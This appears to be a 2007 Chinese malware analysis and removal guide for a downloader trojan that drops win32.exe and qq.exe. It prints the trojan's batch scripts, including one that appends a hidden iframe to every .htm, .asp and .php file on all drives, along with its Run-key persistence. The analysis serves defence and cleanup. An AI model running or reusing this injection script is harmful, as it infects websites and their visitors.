win32.exe qq.exe木马的解决方案_电脑软硬件应用网_国内最受关注的计算机应用解决中心

首页·电脑学院·电脑故障·操作系统·硬件教程·局域网技术·QQ技巧·网络安全·办公软件· 数据库

导航·设计学院·图像处理·网页设计·软件教程·服务器技术·笔记本·专家装机·网络编程·在线问答

当前位置：电脑软硬件应用网 > 电脑学院 > 网络安全 > 正文

win32.exe qq.exe木马的解决方案

win32.exe qq.exe木马的解决方案

2007-8-18 8:56:49　　文/海色の月　　出处:C.I.S.R.T. 　　

　　病毒名称：Trojan-Downloader.Win32.VB.bay（Kaspersky）
　　病毒别名：Trojan.DL.Win32.Agent.xtk（瑞星）
　　　　　 Packes.MaskPE.a（毒霸）
　　病毒大小：33,307 字节
　　加壳方式：PE_Patch.MaskPE
　　样本MD5：7caea44acee382600bba6f4d403a031e
　　样本SHA1：683a9758fd7c2afca7d81780ec4ad92407510727
　　传播方式：恶意网页下载，其它病毒或木马下载

　　技术分析
　　==========

　　木马运行后复制副本到系统目录和IE临时目录：
　　%System%\win32.exe
　　%ietemp%\qq.exe

　　创建启动项：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"qq"="%System%\win32.exe"

　　在当前目录生成批处理kill.bat删除自身原文件：

:redel
del "{原文件}"
if exist "{原文件}" goto redel
del %0
在IE临时目录生成批处理1.bat：
[Copy to clipboard] [ - ]CODE:
@echo off
for %%a in ({各分区}) do (
if exist %%a:\nul (
for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.htm') do (echo ^<iframe src=""http://{已屏蔽}"" width=0 height=0 border=0^>^</iframe^>>> "%%b")))
@echo off
for %%a in ({各分区}) do (
if exist %%a:\nul (
for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.asp') do (echo ^<iframe src="http://{已屏蔽}" width=0 height=0 border=0^>^</iframe^>>> "%%b")))
@echo off
for %%a in ({各分区}) do (
if exist %%a:\nul (
for /f "tokens=*" %%b in ('dir /s/b/a-d %%a:\*.php') do (echo ^<iframe src="http://{已屏蔽}" width=0 height=0 border=0^>^</iframe^>>> "%%b")))

　　往各分区下所有htm*、asp*、php*文件的末尾添加恶意代码：

　　<iframe src=""http://{已屏蔽}"" width=0 height=0 border=0></iframe>
访问网络下载其它病毒、木马或恶意程序到%UserProfile%\Local Settings目录下并运行，文件名为Temporary Internet Files加数字。

　　清除步骤
　　==========

　　down.45its.com下载sreng2.zip和IceSword120_cn.zip(以下简称冰刃)

　　1. 删除木马创建的启动项（打开冰刃－注册表－依次找到病毒注册表选项删除即可）：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"qq"="%System%\win32.exe"

　　2. 删除木马相关文件（详细步骤：打开冰刃－文件－依次找到病毒文件删除即可）：
　　%System%\win32.exe
　　%ietemp%\qq.exe
　　%ietemp%\1.bat
　　%UserProfile%\Local Settings\Temporary Internet Files{数字}.exe
　　%Windows%\1.ini

　　3. 使用工具清除htm*、asp*、php*文件末尾被添加的恶意代码(建议使用360安全卫士进行其它清理，下载地址：down.45its.com)

上一篇文章：访问google提示“Google退出中国,请用百度进行搜索”的解决

下一篇文章： Virus.Win32.AutoRun.ev(,.exe)病毒手动解决

最新热点		最新推荐		相关文章
				删不掉的"淘宝图标"来侵教你删"淘宝… 微软高危漏洞"快捷方式自动执行"手工… acad.vlx删除方法 360se.exe病毒清除解决方案 regedit32.exe 病毒清除解决方案 3874jr98.exe,long.exe等病毒清除解… RG8.tmp病毒清除解决方案 139ujf939.exe,2.exe等病毒清除解决… EntSoQn.exe病毒清除解决方案 360safess.net.exe等病毒清除解决方…